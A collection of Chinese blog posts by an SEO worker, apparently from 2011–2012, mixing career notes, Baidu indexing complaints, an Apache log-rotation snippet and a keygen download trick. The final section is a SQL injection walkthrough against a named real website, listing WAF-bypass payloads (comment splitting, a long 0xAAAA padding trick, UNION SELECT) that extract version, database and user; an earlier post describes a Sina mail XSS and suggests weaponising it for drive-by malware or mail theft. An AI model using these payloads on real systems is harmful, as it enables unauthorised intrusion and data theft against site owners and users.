ErrorLog logs/error_log
CustomLog logs/access_log common

改为

ErrorLog “| /usr/local/apache/bin/rotatelogs /home/logs/www/%Y_%m_%d_error_log 86400 480″
CustomLog “| /usr/local/apache/bin/rotatelogs /home/logs/www/%Y_%m_%d_access_log 86400 480″ common

工作忙是一回事，其实还是很多时候不知道写些什么，2011年是我的本命年，终于没有继续宅在家里，辞去了移动的工作之后，去外地做了一年的全职SEO，这一年很忙，过的也很充实，这段经历远不是宅在一个小城市里面能感受到的。

2011年，在顶着家人压力的情况下，辞职去了一家只有4人的创业型公司，呵呵，现在已经扩大到20人了:)，从事着一份以前一直有想法，但只是业余玩玩的职业——SEO

在瑞丽整形呆了1个多月，找不到感觉，辞职，进入了上面说的那家公司。其实博客不更新跟这个也有关，因为知道了很多以前不知道，网络上也没有提到的东西，比如页面质量、链接结构、网站信息架构、长尾流量的掌握，这些都不是网上能够轻易获得的，正是如此，虽然有很多东西想说，但是却不能说出来，第一：在整个行业如此浮躁的情况下，说出来没多少人会听进去；第二：某些流量挖掘的方法，说出来之后一旦泛滥，会对我自己造成很大的影响。

期间博客挂了3个月，第一个月因为bibihost被攻击，我一直扔在那边没有处理，后面2个月，我迁移到了现在的主机上，由于nginx的限制，加之性能比较弱，mysql经常出问题，又挂了2个月，同样没时间去处理。

元旦放假之后，我提出了辞职，因为我想要自己做点东西出来，而不是跟现在一样，虽然很开心，也的确学到了很多东西，但是对于我以后的发展却不是很有利，所以我提出了辞职，1月18号晚上9点回到家里，开始自己琢磨想要做的事情。

所作项目基本上已经确定，外贸方向，产品也OK，因为是正品，所以相对其他仿牌、擦边球之类的东西要稳定很多，这几天在家调试网站，因为产品要求极为专业，所以对文档的翻译要求非常苛刻，几百个产品文档的整理时间保守估计要3个月才能完成。

外贸SEO方面的东西我从来没有接触过，一直做的是国内SEO方向，所以以前的很多东西都不能再用了，但是相信还是能慢慢摸索出来的。

本博客是2009年2月2日建立的，今天已经2012年1月20日18:17:31了，还有半个月不到的时间就3年了，也算是比较老的了，呵呵。

2012来了，我也没能搞到船票，所以就让我在外贸SEO大军中探索一番吧。

文笔太差，已经写不出大学那种感觉了，over。

然后点击发送邮件。
问题出来了，平常我在挖掘XSS漏洞的时候，需要打开这封邮件，但这个漏洞不需要直接打开直接点击收件，或者收件箱就会直接弹出来如图

这点于其他邮箱不同，其它的邮箱都需要打开那封邮件才会弹，大家可以构造一下，比如构造挂马的，或者直接截取邮箱邮件的客户端。所以这个漏洞只要对方上 sina就会中招，优点就是只要他上这个sina邮箱一次就会中招，缺点是这个代码只会弹出来一次，之后就算打开邮件他也不会弹，具体sina做了什么限 制还不知道，但能弹一次而且不需要打开这封邮件就可以弹已经足够了。刚刚大家回复由于帖子篇幅过大，我已经重新编辑过，只留下sina邮箱XSS漏洞那 段。

在这里顺便提醒一句，大家注意备份数据，以免无妄之灾。

要不是这件事，我估计博客都不会有更新，公司最近太忙了。出来冒个泡，证明博客还没彻底死掉。

本机打开正常，谷歌网管工具打开也正常，请了QQ上很多网友测试也能打开，不知道为什么会这样。

暂时怀疑可能是格式问题，天色太晚了，肚子饿的要命，急着回家。明早上班之后再更新这篇文章吧。

昨天买家说没时间检查，我说等你检查好了就是了，然后今天早上留言给我说码用不了，显示错误。

我郁闷了，以为百度的这个邀请码可能有时间限制，然后自己注册了个小号上去试验了一下，发现提示2个邀请码已经被使用掉，我给买家留言，买家回复了一张图片，说他用不了，图片如下：

可供检查的页面少于32页

我不得不保持沉默，我给卖家发了百度统计官方对此的解释（http://tieba.baidu.com/f?kz=1145831244），可惜对方不置可否。

小小的感慨一下吧，所幸的是这几个邀请码也算是不义之财吧，去了就去了，俗话不是说“不义之财如流水”嘛。

今天想下载一个软件的时候发现居然要注册账号（或许以前也要注册？）

实在是不想注册那么多账号，邮箱里面经常收到很多莫名其妙的信件，跟这些注册的论坛肯定是有所挂钩的。

http://dl.dbank.com/c0w5v7959q，想下载个注册机，点击下载出现以下提示：

dbank数据银行免注册账号下载方法

不想注册账号，复制了一段文字，如图：

dbank数据银行免注册账号下载方法

右键查看源码，按键盘上的Ctrl+F查找刚刚复制的文字“20110621-My Notes Keeper 2.2.2 注册机.rar”，如图：

dbank数据银行免注册账号下载方法

这个时候你有2个选择：1、迅雷下载；2、普通下载

使用迅雷下载的话就往上一行，找到如下字符，如图：

dbank数据银行免注册账号下载方法

按住键盘的shift键，然后用→方向键一直选择，选择到迅雷URL地址结束为止，复制，放到迅雷里面去下载。

如果是用方法2的普通下载，则从我们复制的文字开始往后找，找到第一个“href=”标签，那个URL地址就是下载地址，我们只要复制下来，放到浏览器中下载即可。

刚刚才注意到百度统计的左下角添加了一个百度SEO建议功能，网上搜索了一下，发现很多人都说这东西好使。网上一片欢呼雀跃，先看看网友们对百度SEO建议的评价吧，如下：

百度统计的SEO建议具有如下4大独特优势：

1、权威
唯一一个由百度官方推出的SEO指南性功能产品。
2、具体
SEO影响因素全面扫描，提供具体到页面级别的可执行的优化建议。
3、直观
采用100分打分制，综合评价网站当前SEO水平，一目了然。
4、效果可衡量
结合“百度收录量查询”,及时科学衡量SEO优化效果。

呃，好处看起来很多，大家仔细看一下百度SEO建议其中的检测内容：

1、URL长度：是否符合百度建议url的最长长度(不超过255byte)
2、静态页参数：是否在静态页面上使用动态参数(会造成spider多次和重复抓取)
3、Meta信息完善程度：是否缺少keywords和description的meta标签(这可能会对网页的展现和排序产生一定影响)
4、Frame信息：是否存在frame/frameset/iframe标签(frame会导致百度spider的抓取困难，百度建议您尽量不要使用)
5、flash文字描述：flash是否有文字描述(加入描述的flash文件可以让百度更好的了解您提供的网页)
6、图片Alt信息：是否存在没有alt信息的img标签(加入这项信息可使您网页上的图片更容易被检索到)

呃，我承认我看见这一段介绍之后我退缩了。

理由：

1、URL长度，一般的现有CMS都是以ID序号为URL，例如http://www.xxx.com/mulu1/mulu2/1111111.html
2、静态页参数，特指某些论坛麽？
3、百度在其《SEO官方优化指南1.0》中不是说了keywords和description的meta标签不计入排名算法之中麽，难道现在又开始算了？
4、Frame信息，呃，这个我估计现在的新入行的SEO连他是什么都没听过。
5、常识
6、这个功能我不清楚，不知道是统计的全站还是单受访页面，如果是全站的话这个功能的确很有用，如果是单页面的话就是鸡肋了。

那么，这次的百度统计推出的“百度SEO官方建议”是否还是大家口中的神器？如果就这些功能，那么这东西真不是什么利器，称之为浮云还是比较合适的。

包括我的博客（http://www.llsilver.com/）也是这个情况，site:www.llsilver.com的结果是：

为了提供最相关的结果，我们省略了一些内容相似的条目，点击这里可以看到所有搜索结果

我搜寻了很久没有找到答案，今天很偶然的在逛“百度站长俱乐部”的时候发现了一点可能的端倪，Lee在某个帖子中是这么说的：

请楼主检查站点是否存在过度优化的行为。如果确认已无此行为，请耐心等待。

请楼主检查站点是否存在过度优化的行为。如果确认已无此行为，请耐心等待。

本博客已经很久没有做过SEO相关的改动，自从2010年8月份被百度K站之后几乎没有做过什么大的改动，那么过度优化这个说法自然站不住脚，毕竟我的博客是常年累月的只有10位数以内的收录，现在有40多条已经有所上升。

在这个帖子中，有网友怀疑对此问题的猜测如下：

这些不是网站自身的问题是百度antispam算法的问题
而各位的网站又很不巧撞枪口上了

如果是遇上了百度的antispam算法，那么百度的antispam算法又是如何进行核准的，这种核心机密自然不会公开，那么我们只能再度回归Lee的回答之中：“检查站点是否存在过度优化的行为。如果确认已无此行为，请耐心等待。”

对于百度站长俱乐部这个地址我在百度中搜索，发现只收录了一页，在google搜索，发现了一点好玩的东西，如图：

为了提供最相关的结果，我们省略了与已显示的 1 个类似的条目。 根据您的意愿，可将省略的结果纳入搜索范围后再重新搜索。

展开看看最后结果：

google的真实收录

随便点进去看一下，发现什么端倪没有？

百度贴吧的原有标题是“XXXXXXX – 贴吧——全球最大中文社区”，而现有标题则为“百度贴吧_百度站长俱乐部_XXXXXXX”

我们是否可以认为这是一种刻意的优化？对于下划线与连字符在SEO中的区别我已经在这篇文章中讲过了：SEO中下划线（_）与连字符（-）哪个好

百度在已有阿拉丁机制的情况下为什么会做这种调整？这又算不算是过度优化？

对公司出现这个现象的网站进行分析，发现google网管工具提示大量的“重复的标题题记”

重复的标题题记

现在得出2个怀疑（不敢说是结论）：

1、页面相似度过高，不单单是标题，应该还包括了页面内容，侧边栏内容等。

2、优化过度。这个就不提了。

然后，我打开了追词，之后看见查询出来的数据我就不淡定了。

1号站，收录从6220掉到了1390

2号站，收录从7030掉到了633

3号站，收录从1万0400涨到了3万2100

4号站，收录从6510掉到了209

5号站，收录从4260掉到了442

6号站，收录从1270掉到了748

7号站，收录从596掉到了42

8号站，收录从734掉到了42

9号站，收录从2万7掉到了1610

然后本博客（http://www.llsilver.com/）随着2011年6月27号的这一次PR更新，PR也从4掉到了3。

博客最近因为原先的验证码插件notcaptcha无法正常工作于chrome浏览器而下架，导致茫茫多的SPAM来袭，加上了Willin Kan大师的WP Anti Spam 小牆，再添加了久酷的spam to backlist，因为代码很短，就直接把代码抄到functions.php里面去了,免插件~~~~~呵呵。

哎，这个收录让我情何以堪啊~~~~~

前几今天遇到一个bt 的老外注射点（此注入点使用目前流行的注射工具都射不了）：

http://cleopatra-sy.com/index.php?content=more_product&id=17
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=1 正常
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=2 报错

如图：

突破SQL注入过滤限制

http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 6 正常
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 7 错误

如图：

突破SQL注入过滤限制

继续按照常规的手法注射：

http://cleopatra-sy.com/index.php?content=more_product&id=-17+UNION+SELECT+1,2,3,4,5,6–

如图：

突破SQL注入过滤限制

错误nnd，过滤了UNION+SELECT 我们来加点特殊的字符看看能不能绕过：

http://cleopatra-sy.com/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,2,3,4,5,6–

如图：

突破SQL注入过滤限制

悲剧还是绕不过去 – -，于是尝试自己知道的绕过方法继续射…

http://cleopatra-sy.com/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6–

如图：

突破SQL注入过滤限制

继续：

http://cleopatra-sy.com/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+concat(s,e,l,e,c,t)+all+1,2,3,4,5,6–

如图：

突破SQL注入过滤限制

悲剧还是绕不过去，nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内的站以上几种方法一般都能搞定，老外就是bt。最后实在木有办法了只好去国外的黑客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-

如图：

突破SQL注入过滤限制

靠，老外果然牛B 那么继续射

http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6–+-

如图：成功得到系统版本、当前数据库用户、用户名

突破SQL注入过滤限制

至此终于成功突破SQL注入过滤Union+SELECT。

本文外链图片用的图床是麦库图床。